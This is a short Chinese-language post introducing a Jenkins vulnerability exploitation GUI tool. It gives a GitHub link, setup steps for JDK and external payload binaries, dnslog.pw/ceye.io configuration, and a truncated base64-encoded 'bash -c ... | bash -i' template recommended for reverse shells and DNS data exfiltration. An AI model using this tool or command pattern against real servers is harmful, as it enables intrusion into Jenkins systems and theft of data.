一款Jenkins的综合漏洞利用工具

介绍一款Jenkins的综合漏洞利用工具项目地址：https://github.com/TheBeastofwar/JenkinsExploit-GUI使用jdk版本在windows或linux使用jdk8的哪一个版本应该都可以,在macOS里需要jdk8u较高的版本,比如jdk8u321外置payload从release下载windows_tools,linux_tools或macOS_tools并放在与JenkinsExploit-GUI-*-SNAPSHOT.jar相同的目录,或者可以自行打包tools_source中的python源码文件如果是linux或macOS的话需要对外置payload进行chmod +x 赋予权限  dnslog配置进行dnslog设置,目前仅支持dnslog.pw和ceye.io进行检测在验证无回显命令执行的时候为了避免转义问题,推荐用如下方式进行反弹shell和dnslog外带信息bash -c {echo,Y....}|{base64,-d}|{bash,-i} ………………………………